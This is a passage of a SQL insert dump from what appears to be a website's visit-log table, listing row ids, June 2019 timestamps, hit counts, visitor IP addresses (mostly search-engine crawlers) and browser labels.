.29.198.25','other'),(429604,1560985350,1,1,0,0,'8.29.198.26','other'),(429605,1560985696,1,1,0,0,'95.163.255.150','other'),(429606,1560986462,1,1,0,0,'37.9.113.148','other'),(429607,1560987100,1,1,0,0,'66.249.66.134','chrome'),(429608,1560987129,1,1,0,0,'37.9.113.20','other'),(429609,1560987988,1,1,0,0,'157.55.39.85','other'),(429610,1560988530,1,1,0,0,'157.55.39.79','other'),(429611,1560988886,1,1,0,0,'213.180.203.17','other'),(429612,1560988980,1,1,0,0,'87.250.224.47','other'),(429613,1560989018,1,1,0,0,'66.249.66.136','chrome'),(429614,1560989229,1,1,0,0,'95.163.255.155','other'),(429615,1560990031,1,1,0,0,'54.36.149.86','other'),(429616,1560990071,1,1,0,0,'157.55.39.85','other'),(429617,1560990360,1,1,0,0,'207.46.13.164','other'),(429618,1560992045,1,1,0,0,'54.36.149.61','other'),(429619,1560992805,1,1,0,0,'66.249.66.136','chrome'),(429620,1560993379,2,2,0,0,'54.36.149.60','other'),(429621,1560993395,1,1,0,0,'178.154.244.11','other'),(429622,1560993431,1,1,0,0,'54.36.149.87','other'),(429623,1560993499,1,1,0,0,'157.55.39.83','other'),(429624,1560994066,1,1,0,0,'54.36.149.79','other'),(429625,1560995728,1,1,0,0,'8.29.198.25','other'),(429626,1560995943,1,1,0,0,'95.108.213.4','other'),(429627,1560996225,1,1,0,0,'8.29.198.26','other'),(429628,1560996443,1,1,0,0,'40.77.167.218','other'),(429629,1560996784,1,1,0,0,'207.46.13.162','other'),(429630,1560997098,1,1,0,0,'207.46.13.164','other'),(429631,1560997134,1,1,0,0,'66.249.66.136','chrome'),(429632,1560997324,1,1,0,0,'54.36.149.8','other'),(429633,1560997973,1,1,0,0,'54.36.149.80','other'),(429634,1560998313,1,1,0,0,'207.46.13.194','other'),(429635,1560998606,1,1,0,0,'40.77.167.128','other'),(429636,1560998792,1,1,0,0,'54.36.149.60','other'),(429637,1560999265,1,1,0,0,'54.36.149.54','other'),(429638,1560999656,1,1,0,0,'54.36.149.46','other'),(429639,1560999726,1,1,0,0,'54.36.149.91','other'),(429640,1561000261,1,1,0,0,'66.249.66.134','chrome'),(429641,1561000296,1,1,0,0,'193.106.30.98','chrome'),(429642,1561000755,1,1,0,0,'51.255.65.46','other'),(429643,1561000786,1,1,0,0,'95.163.255.95','other'),(429644,1561000886,2,2,0,0,'66.249.66.136','chrome'),(429645,1561000895,1,1,0,0,'40.77.167.128','other'),(429646,1561001663,1,1,0,0,'66.249.66.138','chrome'),(429647,1561002083,2,2,0,0,'40.77.167.128','other'),(429648,1561002087,2,2,0,0,'157.55.39.182','other'),(429649,1561002092,2,2,0,0,'157.55.39.211','other'),(429650,1561002535,1,1,0,0,'207.46.13.162','other'),(429651,1561002686,1,1,0,0,'95.163.255.164','other'),(429652,1561002757,1,1,0,0,'54.36.149.45','other'),(429653,1561003027,1,1,0,0,'13.66.139.0','other'),(429654,1561003095,1,1,0,0,'54.36.149.79','other'),(429655,1561003122,1,1,0,0,'178.255.215.94','other'),(429656,1561003421,1,1,0,0,'54.36.149.7','other'),(429657,1561003477,1,1,0,0,'66.249.66.66','chrome'),(429658,1561003860,2,2,0,0,'66.249.66.134','chrome'),(429659,1561004087,2,2,0,0,'157.55.39.182','other'),(429660,1561005775,1,1,0,0,'66.249.66.68','chrome'),(429661,1561006298,1,1,0,0,'38.145.87.90','chrome'),(429662,1561006598,1,1,0,0,'8.29.198.26','other'),(429663,1561007033,1,1,0,0,'66.249.66.134','chrome'),(429664,1561007086,1,1,0,0,'8.29.198.25','other'),(429665,1561007837,1,1,0,0,'91.196.178.190','chrome'),(429666,1561008272,2,2,0,0,'176.9.9.94','other'),(429667,1561008321,1,1,0,0,'207.46.13.141','other'),(429668,1561008466,1,1,0,0,'157.55.39.211','other'),(429669,1561008971,1,1,0,0,'66.249.66.136','chrome'),(429670,1561009040,1,1,0,0,'66.249.66.134','chrome'),(429671,1561009390,1,1,0,0,'66.249.66.138','chrome'),(429672,1561010009,1,1,0,0,'91.196.178.87','chrome'),(429673,1561011823,1,1,0,0,'91.196.178.71','chrome'),(429674,1561012064,1,1,0,0,'91.196.178.52','chrome'),(429675,1561012300,1,1,0,0,'13.66.139.0','other'),(429676,1561012741,1,1,0,0,'178.154.244.11','other'),(429677,1561013077,1,1,0,0,'5.45.207.19','other'),(429678,1561013574,2,2,0,0,'66.249.66.136','chrome'),(429679,1561013708,1,1,0,0,'91.196.178.87','chrome'),(429680,1561013764,2,2,0,0,'66.249.66.138','chrome'),(429681,1561014644,1,1,0,0,'91.196.178.74','chrome'),(429682,1561016450,1,1,0,0,'66.249.66.134','chrome'),(429683,1561016618,1,1,0,0,'157.55.39.211','other'),(429684,1561016694,2,2,0,0,'66.249.66.138','chrome'),(429685,1561016812,1,1,0,0,'66.249.66.68','chrome'),(429686,1561017492,2,2,0,0,'8.29.198.26','other'),(429687,1561018406,1,1,0,0,'91.196.178.74','chrome'),(429688,1561018514,1,1,0,0,'54.183.149.148','chrome'),(429689,1561019090,1,1,0,0,'91.196.178.52','chrome'),(429690,1561020450,1,1,0,0,'91.196.178.74','chrome'),(429691,1561020537,1,1,0,0,'66.249.66.136','chrome'),(429692,1561020745,1,1,0,0,'91.196.178.103','chrome'),(429693,1561021189,1,1,0,0,'66.249.66.138','chrome'),(429694,1561021441,2,2,0,0,'66.249.66.136','chrome'),(429695,1561022516,1,1,0,0,'40.77.167.24','other'),(429696,1561022814,1,1,0,0,'66.249.66.136','chrome'),(429697,1561022835,2,2,0,0,'66.249.66.138','chrome'),(429698,1561022945,2,2,0,0,'66.249.66.134','chrome'),(429699,1561023283,1,1,0,0,'66.249.66.66','chrome'),(429700,1561023883,1,1,0,0,'157.55.39.211','other'),(429701,1561025331,1,1,0,0,'66.249.66.134','chrome'),(429702,1561025333,1,1,0,0,'66.249.66.136','chrome'),(429703,1561025383,1,1,0,0,'157.55.39.211','other'),(429704,1561025414,1,1,0,0,'207.46.13.30','other'),(429705,1561025653,1,1,0,0,'207.46.13.24','other'),(429707,1561025989,2,2,0,0,'37.53.228.153','chrome'),(429708,1561026438,1,1,0,0,'207.46.13.26','other'),(429709,1561026737,1,1,0,0,'176.9.9.94','other'),(429710,1561027252,3,3,0,0,'66.249.66.134','chrome'),(429711,1561028370,1,1,0,0,'8.29.198.25','other'),(429712,1561028706,1,1,0,0,'157.55.39.211','other'),(429713,1561028850,1,1,0,0,'8.29.198.27','other'),(429714,1561029285,1,1,0,0,'193.106.30.98','chrome'),(429715,1561029907,1,1,0,0,'141.8.142.103','other'),(429716,1561029961,1,1,0,0,'66.249.66.136','chrome'),(429717,1561030047,1,1,0,0,'91.196.178.94','chrome'),(429718,1561030463,1,1,0,0,'5.45.207.19','other'),(429719,1561030768,1,1,0,0,'91.196.178.74','chrome'),(429720,1561031308,1,1,0,0,'91.196.178.87','chrome'),(429721,1561031636,1,1,0,0,'66.249.66.134','chrome'),(429722,1561032481,1,1,0,0,'176.105.99.10','firefox'),(429723,1561033284,1,1,0,0,'66.249.66.66','chrome'),(429724,1561033353,1,1,0,0,'66.249.66.136','chrome'),(429725,1561033550,1,1,0,0,'91.196.178.129','chrome'),(429726,1561035109,1,1,0,0,'207.46.13.26','other'),(429727,1561035171,1,1,0,0,'207.46.13.247','other'),(429728,1561036270,1,1,0,0,'82.207.120.65','chrome'),(429729,1561036772,1,1,0,0,'178.154.244.11','other'),(429730,1561037043,1,1,0,0,'66.249.66.134','chrome'),(429731,1561037102,3,3,0,0,'66.249.66.138','chrome'),(429732,1561038276,1,1,0,0,'157.55.39.88','other'),(429733,1561039083,1,1,0,0,'66.249.66.136','chrome'),(429734,1561039267,2,2,0,0,'8.29.198.27','other'),(429735,1561039952,2,2,0,0,'66.249.66.134','chrome'),(429736,1561040453,1,1,0,0,'207.46.13.206','other'),(429737,1561041434,1,1,0,0,'31.41.94.60','chrome'),(429738,1561041471,1,1,0,0,'157.55.39.88','other'),(429739,1561042566,1,1,0,0,'178.154.171.17','other'),(429740,1561043685,1,1,0,0,'109.201.154.250','other'),(429741,1561043971,1,1,0,0,'66.249.66.134','chrome'),(429742,1561044373,1,1,0,0,'157.55.39.88','other'),(429743,1561044511,1,1,0,0,'52.162.161.148','other'),(429744,1561045435,1,1,0,0,'176.9.9.94','other'),(429745,1561045919,2,2,0,0,'66.249.66.64','chrome'),(429746,1561047090,2,2,0,0,'157.55.39.88','other'),(429747,1561047869,1,1,0,0,'66.249.66.138','chrome'),(429748,1561047919,1,1,0,0,'46.211.104.19','chrome'),(429749,1561048136,1,1,0,0,'40.77.167.54','other'),(429750,1561048228,1,1,0,0,'207.46.13.206','other'),(429751,1561048457,1,1,0,0,'66.249.66.134','chrome'),(429752,1561048997,1,1,0,0,'66.249.66.66','chrome'),(429753,1561049982,1,1,0,0,'91.209.11.236','other'),(429754,1561050134,1,1,0,0,'8.29.198.26','other'),(429755,1561050634,1,1,0,0,'8.29.198.25','other'),(429756,1561051037,1,1,0,0,'40.77.167.103','other'),(429757,1561051571,1,1,0,0,'157.55.39.88','other'),(429758,1561051577,1,1,0,0,'5.45.207.19','other'),(429759,1561051947,1,1,0,0,'207.46.13.206','other'),(429760,1561051951,1,1,0,0,'40.77.167.54','other'),(429761,1561052902,1,1,0,0,'40.77.167.103','other'),(429762,1561053449,1,1,0,0,'91.196.178.57','chrome'),(429763,1561053582,1,0,1,0,'66.249.66.68',''),(429764,1561055032,1,1,0,0,'91.196.178.33','chrome'),(429765,1561055059,2,1,1,0,'66.249.66.134',''),(429766,1561055100,1,1,0,0,'40.77.167.103','other'),(429767,1561055165,1,1,0,0,'157.55.39.144','other'),(429768,1561055953,1,1,0,0,'40.77.167.54','other'),(429769,1561056040,1,1,0,0,'66.249.66.134','chrome'),(429770,1561056630,1,1,0,0,'95.108.213.4','other'),(429771,1561056868,4,4,0,0,'207.46.13.86','other'),(429772,1561056872,4,4,0,0,'40.77.167.54','other'),(429773,1561056885,1,1,0,0,'46.211.67.25','chrome'),(429774,1561057086,1,1,0,0,'128.72.159.196','msie'),(429775,1561058205,2,2,0,0,'66.249.66.138','chrome'),(429776,1561058276,2,2,0,0,'40.77.167.103','other'),(429777,1561058749,1,1,0,0,'157.55.39.138','other'),(429778,1561059066,2,2,0,0,'5.45.207.79','other'),(429779,1561059296,1,1,0,0,'157.55.39.130','other'),(429780,1561059438,1,1,0,0,'66.249.66.64','chrome'),(429781,1561059844,1,1,0,0,'66.249.66.138','chrome'),(429782,1561060725,1,1,0,0,'66.249.66.136','chrome'),(429783,1561060876,1,1,0,0,'157.55.39.244','other'),(429784,1561061009,1,1,0,0,'8.29.198.27','other'),(429785,1561061519,1,1,0,0,'8.29.198.25','other'),(429786,1561062246,3,3,0,0,'157.55.39.244','other'),(429787,1561062250,1,1,0,0,'157.55.39.247','other'),(429788,1561062255,2,2,0,0,'207.46.13.97','other'),(429789,1561064338,1,1,0,0,'66.249.66.138','chrome'),(429790,1561064543,2,2,0,0,'207.46.13.97','other'),(429791,1561065281,2,2,0,0,'40.77.167.152','other'),(429792,1561065733,1,1,0,0,'207.46.13.97','other'),(429793,1561067754,1,1,0,0,'157.55.39.244','other'),(429794,1561069280,1,1,0,0,'66.249.66.66','chrome'),(429795,1561069289,1,1,0,0,'95.108.213.4','other'),(429796,1561069361,1,1,0,0,'157.55.39.244','other'),(429797,1561069459,1,1,0,0,'5.45.207.19','other'),(429798,1561069471,1,1,0,0,'5.45.207.79','other'),(429799,1561069655,1,1,0,0,'66.249.66.138','chrome'),(429800,1561070059,1,1,0,0,'66.249.66.136','chrome'),(429801,1561070330,1,1,0,0,'66.249.66.134','chrome'),(429802,1561070893,2,2,0,0,'207.46.13.103','other'),(429803,1561070898,4,4,0,0,'207.46.13.104','other'),(429804,1561070903,3,3,0,0,'157.55.39.244','other'),(429805,1561070907,3,3,0,0,'40.77.167.50','other'),(429806,1561071372,1,1,0,0,'66.249.66.136','chrome'),(429807,1561071450,1,1,0,0,'66.249.66.64','chrome'),(429808,1561071894,1,1,0,0,'8.29.198.26','other'),(429809,1561072175,1,1,0,0,'178.154.244.11','other'),(429810,1561072186,1,1,0,0,'157.55.39.244','other'),(429811,1561072393,1,1,0,0,'8.29.198.25','other'),(429812,1561073609,1,1,0,0,'37.9.113.148','other'),(429813,1561073707,1,1,0,0,'66.249.66.134','chrome'),(429814,1561074238,1,1,0,0,'5.45.207.8','other'),(429815,1561074242,1,1,0,0,'141.8.142.38','other'),(429816,1561074497,1,1,0,0,'40.77.167.50','other'),(429817,1561075243,1,1,0,0,'176.9.9.94','other'),(429818,1561075578,1,1,0,0,'157.55.39.226','other'),(429819,1561075736,1,1,0,0,'40.77.167.50','other'),(429820,1561076065,1,1,0,0,'66.249.66.138','chrome'),(429821,1561076203,1,1,0,0,'66.249.66.134','chrome'),(429822,1561076848,1,1,0,0,'157.55.39.226','other'),(429823,1561077201,1,1,0,0,'40.77.167.50','other'),(429824,1561077590,3,3,0,0,'66.249.66.134','chrome'),(429825,1561077636,1,1,0,0,'66.249.66.66','chrome'),(429826,1561078578,1,1,0,0,'66.249.66.134','chrome'),(429827,1561079115,1,1,0,0,'157.55.39.226','other'),(429828,1561079122,1,1,0,0,'40.77.167.50','other'),(429829,1561080534,1,1,0,0,'66.249.66.136','chrome'),(429830,1561082758,2,2,0,0,'8.29.198.26','other'),(429831,1561083792,2,2,0,0,'66.249.66.134','chrome'),(429832,1561084730,1,1,0,0,'66.249.66.66','chrome'),(429833,1561085897,1,1,0,0,'40.77.167.50','other'),(429834,1561087558,3,3,0,0,'157.55.39.93','other'),(429835,1561087622,1,1,0,0,'66.249.66.68','chrome'),(429836,1561087667,2,2,0,0,'176.9.9.94','other'),(429837,1561087723,1,1,0,0,'207.46.13.171','other'),(429838,1561087813,1,1,0,0,'66.249.66.136','chrome'),(429839,1561088676,1,1,0,0,'157.55.39.93','other'),(429840,1561089740,1,1,0,0,'77.123.109.50','firefox'),(429841,1561090637,1,1,0,0,'176.9.210.82','chrome'),(429842,1561091912,1,1,0,0,'91.196.178.131','firefox'),(429843,1561092510,1,1,0,0,'66.249.66.134','chrome'),(429844,1561092670,1,1,0,0,'5.45.207.19','other'),(429845,1561092936,1,1,0,0,'5.45.207.79','other'),(429846,1561093105,2,2,0,0,'157.55.39.251','other'),(429847,1561093189,1,1,0,0,'178.154.244.11','other'),(429848,1561093233,1,1,0,0,'66.249.66.138','chrome'),(429849,1561093616,1,1,0,0,'8.29.198.27','other'),(429850,1561094158,1,1,0,0,'8.29.198.25','other'),(429851,1561094478,1,1,0,0,'180.76.15.26','other'),(429852,1561095022,1,1,0,0,'178.17.166.146','other'),(429853,1561095389,2,2,0,0,'40.77.167.71','other'),(429854,1561095487,1,1,0,0,'66.249.66.64','chrome'),(429855,1561095852,1,1,0,0,'40.77.167.167','other'),(429856,1561096966,1,1,0,0,'66.249.66.134','chrome'),(429857,1561097770,1,1,0,0,'46.211.67.11','other'),(429858,1561098127,1,1,0,0,'91.196.178.169','chrome'),(429859,1561098455,1,1,0,0,'91.196.178.88','chrome'),(429860,1561099300,2,2,0,0,'176.9.9.94','other'),(429861,1561099753,1,1,0,0,'157.55.39.93','other'),(429862,1561100320,1,1,0,0,'157.55.39.172','other'),(429863,1561100324,1,1,0,0,'91.196.178.173','chrome'),(429864,1561100656,1,1,0,0,'207.46.13.171','other'),(429865,1561100912,1,1,0,0,'66.249.66.134','chrome'),(429866,1561101560,2,2,0,0,'37.9.113.20','other'),(429867,1561101600,1,1,0,0,'93.73.160.193','firefox'),(429868,1561102996,1,1,0,0,'193.106.30.98','chrome'),(429869,1561103184,1,1,0,0,'157.55.39.172','other'),(429870,1561103395,1,1,0,0,'207.46.13.171','other'),(429871,1561103737,1,1,0,0,'95.108.213.4','other'),(429872,1561104486,1,1,0,0,'8.29.198.27','other'),(429873,1561104531,1,1,0,0,'66.249.66.138','chrome'),(429874,1561105043,1,1,0,0,'8.29.198.25','other'),(429875,1561105145,1,1,0,0,'157.55.39.172','other'),(429876,1561105149,2,2,0,0,'207.46.13.171','other'),(429877,1561105155,1,1,0,0,'157.55.39.93','other'),(429878,1561105769,1,1,0,0,'141.8.142.108','other'),(429879,1561105863,1,1,0,0,'37.9.113.20','other'),(429880,1561105987,3,3,0,0,'66.249.66.134','chrome'),(429881,1561106095,1,1,0,0,'66.249.66.64','chrome'),(429882,1561106209,3,3,0,0,'66.249.66.136','chrome'),(429883,1561106241,1,1,0,0,'141.8.183.22','other'),(429884,1561107590,1,1,0,0,'66.249.66.138','chrome'),(429885,1561108066,1,1,0,0,'66.249.66.136','chrome'),(429886,1561109947,1,1,0,0,'157.55.39.172','other'),(429887,1561110185,1,1,0,0,'66.249.66.64','chrome'),(429888,1561110557,1,1,0,0,'37.73.235.49','chrome'),(429889,1561111076,1,1,0,0,'176.9.9.94','other'),(429890,1561111209,1,1,0,0,'157.55.39.93','other'),(429891,1561111212,1,1,0,0,'91.196.178.57','chrome'),(429892,1561112552,1,1,0,0,'109.74.154.72','chrome'),(429893,1561112666,1,1,0,0,'40.77.167.21','other'),(429894,1561113418,1,1,0,0,'157.55.39.172','other'),(429895,1561113426,1,1,0,0,'40.77.167.110','other'),(429896,1561114150,2,2,0,0,'66.249.66.136','chrome'),(429897,1561114407,2,2,0,0,'157.55.39.172','other'),(429898,1561114655,2,2,0,0,'157.55.39.93','other'),(429899,1561115349,1,1,0,0,'8.29.198.27','other'),(429900,1561115947,1,1,0,0,'8.29.198.26','other'),(429901,1561116497,1,1,0,0,'195.69.223.194','chrome'),(429902,1561116599,1,1,0,0,'178.154.244.11','other'),(429903,1561117855,1,1,0,0,'207.46.13.250','other'),(429904,1561118669,1,1,0,0,'178.154.244.11','other'),(429905,1561119509,1,1,0,0,'40.77.167.21','other'),(429906,1561120617,1,1,0,0,'178.154.244.11','other'),(429907,1561120742,1,1,0,0,'66.249.66.134','chrome'),(429908,1561120763,2,2,0,0,'40.77.167.39','other'),(429909,1561122593,1,1,0,0,'82.145.209.163','other'),(429910,1561122619,1,1,0,0,'40.77.167.21','other'),(429911,1561123198,1,1,0,0,'66.249.66.222','chrome'),(429912,1561123250,1,1,0,0,'5.83.23.13','chrome'),(429913,1561123362,1,1,0,0,'176.9.9.94','other'),(429914,1561123592,1,1,0,0,'91.195.68.126','chrome'),(429915,1561124678,1,1,0,0,'91.196.178.71','firefox'),(429916,1561125436,1,1,0,0,'66.249.66.68','chrome'),(429917,1561126038,1,1,0,0,'178.154.244.11','other'),(429918,1561126241,1,1,0,0,'40.77.167.190','other'),(429919,1561126254,2,2,0,0,'8.29.198.26','other'),(429920,1561126351,1,1,0,0,'91.195.68.108','chrome'),(429921,1561126843,1,1,0,0,'40.77.167.21','other'),(429922,1561128157,1,1,0,0,'66.249.66.134','chrome'),(429923,1561128235,1,1,0,0,'157.230.178.161','firefox'),(429924,1561128348,2,2,0,0,'40.77.167.190','other'),(429925,1561128467,1,1,0,0,'91.195.68.108','chrome'),(429926,1561128725,1,0,1,0,'66.249.66.66',''),(429927,1561128753,1,0,1,0,'66.249.66.64',''),(429928,1561129359,1,1,0,0,'178.154.244.11','other'),(429929,1561129979,1,1,0,0,'5.45.207.19','other'),(429930,1561130644,1,1,0,0,'40.77.167.190','other'),(429931,1561132036,1,1,0,0,'5.45.207.19','other'),(429932,1561132590,1,1,0,0,'66.249.66.136','chrome'),(429933,1561133494,1,1,0,0,'40.77.167.190','other'),(429934,1561133927,1,1,0,0,'5.45.207.79','other'),(429935,1561134222,1,1,0,0,'13.66.139.0','other'),(429936,1561134308,1,1,0,0,'66.249.66.68','chrome'),(429937,1561134347,1,1,0,0,'66.249.66.138','chrome'),(429938,1561136287,3,3,0,0,'40.77.167.190','other'),(429939,1561136450,1,1,0,0,'157.55.39.214','other'),(429940,1561136576,1,1,0,0,'141.8.142.103','other'),(429941,1561137069,2,2,0,0,'207.46.13.250','other'),(429942,1561137157,2,2,0,0,'8.29.198.25','other'),(429943,1561137231,1,1,0,0,'91.196.178.182','chrome'),(429944,1561137967,2,2,0,0,'66.249.66.134','chrome'),(429945,1561138709,1,1,0,0,'66.249.66.136','chrome'),(429946,1561139806,1,1,0,0,'157.55.39.214','other'),(429947,1561140222,2,2,0,0,'66.249.66.136','chrome'),(429948,1561140455,1,1,0,0,'40.77.167.222','other'),(429949,1561140653,1,1,0,0,'95.163.255.97','other'),(429950,1561141167,1,1,0,0,'141.8.183.22','other'),(429951,1561142127,1,1,0,0,'40.77.167.190','other'),(429952,1561142355,1,1,0,0,'157.55.39.214','other'),(429953,1561142441,1,1,0,0,'66.249.66.138','chrome'),(429954,1561144262,1,1,0,0,'13.66.139.0','other'),(429955,1561144448,1,1,0,0,'40.77.167.103','other'),(429956,1561144946,1,1,0,0,'157.55.39.214','other'),(429957,1561145415,1,1,0,0,'66.249.66.136','chrome'),(429958,1561147155,2,2,0,0,'176.9.9.94','other'),(429959,1561147694,1,1,0,0,'66.249.66.66','chrome'),(429960,1561147711,2,2,0,0,'66.249.66.138','chrome'),(429961,1561147728,2,2,0,0,'66.249.66.134','chrome'),(429962,1561148019,2,2,0,0,'8.29.198.25','other'),(429963,1561148507,1,1,0,0,'82.145.210.194','other'),(429964,1561149049,1,1,0,0,'109.207.199.208','chrome'),(429965,1561149872,1,1,0,0,'157.55.39.105','other'),(429966,1561150390,1,1,0,0,'178.154.244.11','other'),(429967,1561151438,1,1,0,0,'66.249.66.134','chrome'),(429968,1561151446,1,1,0,0,'157.55.39.190','other'),(429969,1561152272,1,1,0,0,'91.196.178.167','firefox'),(429970,1561152332,1,1,0,0,'69.168.165.168','other'),(429971,1561152553,1,1,0,0,'95.163.255.187','other'),(429972,1561153044,1,1,0,0,'157.55.39.166','other'),(429973,1561153817,1,1,0,0,'66.249.66.134','chrome'),(429974,1561154243,2,2,0,0,'5.45.207.79','other'),(429975,1561155975,1,1,0,0,'193.106.30.98','chrome'),(429976,1561156752,1,1,0,0,'157.55.39.190','other'),(429977,1561157662,1,1,0,0,'95.163.255.94','other'),(429978,1561158531,1,1,0,0,'95.163.255.158','other'),(429979,1561158886,2,2,0,0,'8.29.198.25','other'),(429980,1561159583,1,1,0,0,'176.9.9.94','other'),(429981,1561160677,1,1,0,0,'209.17.96.34','other'),(429982,1561161773,2,2,0,0,'157.55.39.105','other'),(429983,1561162817,1,1,0,0,'66.249.66.68','chrome'),(429984,1561163016,1,1,0,0,'95.108.181.83','other'),(429985,1561163058,1,1,0,0,'87.250.224.47','other'),(429986,1561163183,1,1,0,0,'157.55.39.166','other'),(429987,1561163453,1,1,0,0,'157.55.39.190','other'),(429988,1561163660,2,2,0,0,'66.249.66.134','chrome'),(429989,1561167154,1,1,0,0,'66.249.66.66','chrome'),(429990,1561167178,1,1,0,0,'207.46.13.108','other'),(429991,1561167564,1,1,0,0,'87.250.224.81','other'),(429992,1561168115,1,1,0,0,'141.8.183.22','other'),(429993,1561169137,1,1,0,0,'141.8.142.38','other'),(429994,1561169155,1,1,0,0,'178.154.244.11','other'),(429995,1561169459,1,1,0,0,'157.55.39.181','other'),(429996,1561169739,2,2,0,0,'8.29.198.26','other'),(429997,1561170095,1,1,0,0,'66.249.66.134','chrome'),(429998,1561170905,2,2,0,0,'178.154.244.11','other'),(429999,1561170966,1,1,0,0,'176.9.9.94','other'),(430000,1561171666,1,1,0,0,'66.249.66.134','chrome'),(430001,1561171946,1,1,0,0,'66.249.66.66','chrome'),(430002,1561172089,1,1,0,0,'66.249.66.64','chrome'),(430003,1561172550,1,1,0,0,'157.55.39.126','other'),(430004,1561173022,1,1,0,0,'66.249.66.136','chrome'),(430005,1561173155,1,1,0,0,'207.46.13.74','other'),(430006,1561174051,1,1,0,0,'141.8.142.38','other'),(430007,1561175036,1,1,0,0,'95.132.29.7','chrome'),(430008,1561175162,1,1,0,0,'66.102.9.30','chrome'),(430009,1561175718,1,1,0,0,'95.163.255.187','other'),(430010,1561176585,1,1,0,0,'66.249.66.134','chrome'),(430011,1561177042,1,1,0,0,'66.249.66.138','chrome'),(430012,1561177547,1,1,0,0,'157.55.39.211','other'),(430013,1561179587,1,1,0,0,'141.8.142.103','other'),(430014,1561180037,1,1,0,0,'157.55.39.126','other'),(430015,1561180156,1,1,0,0,'157.55.39.142','other'),(430016,1561180221,1,1,0,0,'157.55.39.211','other'),(430017,1561180589,2,2,0,0,'8.29.198.27','other'),(430018,1561180846,1,1,0,0,'52.162.161.148','other'),(430019,1561182032,1,1,0,0,'193.106.30.98','chrome'),(430020,1561182131,1,1,0,0,'77.247.181.165','other'),(430021,1561182407,1,1,0,0,'157.55.39.211','other'),(430022,1561182530,1,1,0,0,'180.76.15.151','other'),(430023,1561182640,1,1,0,0,'157.55.39.126','other'),(430024,1561183203,1,1,0,0,'66.249.66.136','chrome'),(430025,1561183691,1,1,0,0,'157.55.39.211','other'),(430026,1561187115,1,1,0,0,'95.163.255.178','other'),(430027,1561187517,1,1,0,0,'66.249.66.134','chrome'),(430028,1561188657,1,1,0,0,'5.45.207.79','other'),(430029,1561188694,1,1,0,0,'178.154.244.11','other'),(430030,1561188915,2,2,0,0,'91.196.177.15','chrome'),(430031,1561189068,1,1,0,0,'66.249.66.136','chrome'),(430032,1561190570,1,1,0,0,'91.196.178.99','chrome'),(430033,1561191348,1,1,0,0,'66.249.66.136','chrome'),(430034,1561191442,1,1,0,0,'8.29.198.27','other'),(430035,1561191754,1,1,0,0,'95.163.255.92','other'),(430036,1561192077,1,1,0,0,'8.29.198.26','other'),(430037,1561192310,1,1,0,0,'178.154.244.11','other'),(430038,1561192348,2,2,0,0,'95.163.255.159','other'),(430039,1561192483,1,1,0,0,'176.9.9.94','other'),(430040,1561192658,1,1,0,0,'95.163.255.183','other'),(430041,1561192918,1,1,0,0,'95.163.255.166','other'),(430042,1561193065,1,1,0,0,'207.46.13.229','other'),(430043,1561193126,6,6,0,0,'157.55.39.211','other'),(430044,1561193849,2,2,0,0,'207.46.13.73','other'),(430045,1561193889,1,1,0,0,'46.166.137.208','other'),(430046,1561194404,1,1,0,0,'66.249.66.134','chrome'),(430047,1561194827,1,1,0,0,'66.249.66.136','chrome'),(430048,1561196426,1,1,0,0,'66.249.66.136','chrome'),(430049,1561197442,1,1,0,0,'66.249.66.138','chrome'),(430050,1561197816,1,1,0,0,'109.74.154.72','chrome'),(430051,1561198896,40,40,0,0,'66.249.66.134','chrome'),(430052,1561198903,7,7,0,0,'66.249.66.136','chrome'),(430053,1561198905,1,1,0,0,'213.180.203.17','other'),(430054,1561198975,1,1,0,0,'207.46.13.72','other'),(430055,1561199395,1,1,0,0,'95.135.88.199','chrome'),(430056,1561199858,2,2,0,0,'207.46.13.229','other'),(430057,1561200028,1,1,0,0,'66.249.66.138','chrome'),(430058,1561200042,1,1,0,0,'66.249.66.136','chrome'),(430059,1561200059,1,1,0,0,'207.46.13.72','other'),(430060,1561200241,1,1,0,0,'207.46.13.66','other'),(430061,1561201073,1,1,0,0,'157.55.39.214','other'),(430062,1561201597,1,1,0,0,'207.46.13.66','other'),(430063,1561201687,1,1,0,0,'40.77.167.89','other'),(430064,1561202154,1,1,0,0,'5.45.207.19','other'),(430065,1561202231,1,1,0,0,'46.96.19.189','other'),(430066,1561202258,1,1,0,0,'95.108.213.4','other'),(430067,1561202269,1,1,0,0,'66.249.66.138','chrome'),(430068,1561202318,1,1,0,0,'8.29.198.26','other'),(430069,1561202949,1,1,0,0,'8.29.198.25','other'),(430070,1561203253,1,1,0,0,'176.9.9.94','other'),(430071,1561203706,1,1,0,0,'5.45.207.79','other'),(430072,1561203998,2,2,0,0,'40.77.167.17','other'),(430073,1561204001,1,1,0,0,'95.163.255.159','other'),(430074,1561205058,1,1,0,0,'66.249.66.136','chrome'),(430075,1561205545,18,18,0,0,'5.9.70.113','other'),(430076,1561205755,1,1,0,0,'5.45.207.19','other'),(430077,1561206493,2,2,0,0,'178.154.244.11','other'),(430078,1561207963,2,2,0,0,'157.55.39.214','other'),(430079,1561207966,1,1,0,0,'207.46.13.29','other'),(430080,1561208017,1,1,0,0,'193.106.30.98','chrome'),(430081,1561208198,1,1,0,0,'40.77.167.104','other'),(430082,1561208946,1,1,0,0,'95.163.255.92','other'),(430083,1561209441,1,1,0,0,'40.77.167.104','other'),(430084,1561209792,1,1,0,0,'95.163.255.151','other'),(430085,1561209974,2,2,0,0,'66.249.66.136','chrome'),(430086,1561211268,1,1,0,0,'141.8.142.103','other'),(430087,1561211556,1,1,0,0,'207.46.13.29','other'),(430088,1561213192,1,1,0,0,'8.29.198.27','other'),(430089,1561213219,1,1,0,0,'157.55.39.135','other'),(430090,1561213462,1,1,0,0,'40.77.167.178','other'),(430091,1561213805,1,1,0,0,'8.29.198.26','other'),(430092,1561213982,1,1,0,0,'176.9.9.94','other'),(430093,1561216262,1,1,0,0,'66.249.66.134','chrome'),(430094,1561216841,1,1,0,0,'157.55.39.135','other'),(430095,1561216856,1,1,0,0,'40.77.167.178','other'),(430096,1561217216,1,1,0,0,'87.250.224.107','other'),(430097,1561218069,1,1,0,0,'157.55.39.135','other'),(430098,1561218261,1,1,0,0,'40.77.167.104','other'),(430099,1561218412,1,1,0,0,'40.77.167.178','other'),(430100,1561219012,1,1,0,0,'91.196.178.103','chrome'),(430101,1561219185,1,1,0,0,'40.77.167.49','other'),(430102,1561220163,1,1,0,0,'40.77.167.104','other'),(430103,1561220763,1,1,0,0,'5.45.207.79','other'),(430104,1561221189,1,1,0,0,'95.163.255.172','other'),(430105,1561222928,1,1,0,0,'40.77.167.29','other'),(430106,1561223118,1,1,0,0,'207.46.13.220','other'),(430107,1561223883,1,1,0,0,'176.9.9.94','other'),(430108,1561224048,1,1,0,0,'8.29.198.25','other'),(430109,1561224077,1,1,0,0,'5.45